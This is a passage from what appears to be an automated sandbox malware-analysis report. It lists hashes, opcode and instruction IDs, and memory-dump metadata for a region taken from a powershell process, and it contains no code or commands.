                                                                    • Instruction Fuzzy Hash: 2B21F3B5A0432BEFCF258E58E4A0665BBF0AF25252F1941A7CD48C6901D33984C6EB51
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $]q$$]q$$]q$$]q
                                                                    • API String ID: 0-858218434
                                                                    • Opcode ID: bed68b5c3184975a9b7b7717d974b2dfaf81c7f74a86990f9dede50e162b826f
                                                                    • Instruction ID: fec30c31fa5b90534131c5d70f6e1141615d73c951494cdc773aeb7e62b82832
                                                                    • Opcode Fuzzy Hash: bed68b5c3184975a9b7b7717d974b2dfaf81c7f74a86990f9dede50e162b826f
                                                                    • Instruction Fuzzy Hash: 8111DFB2A0832ADFCF248E5AC48467AB7F0AFB1657F58806AC844C7201D731D4C2E792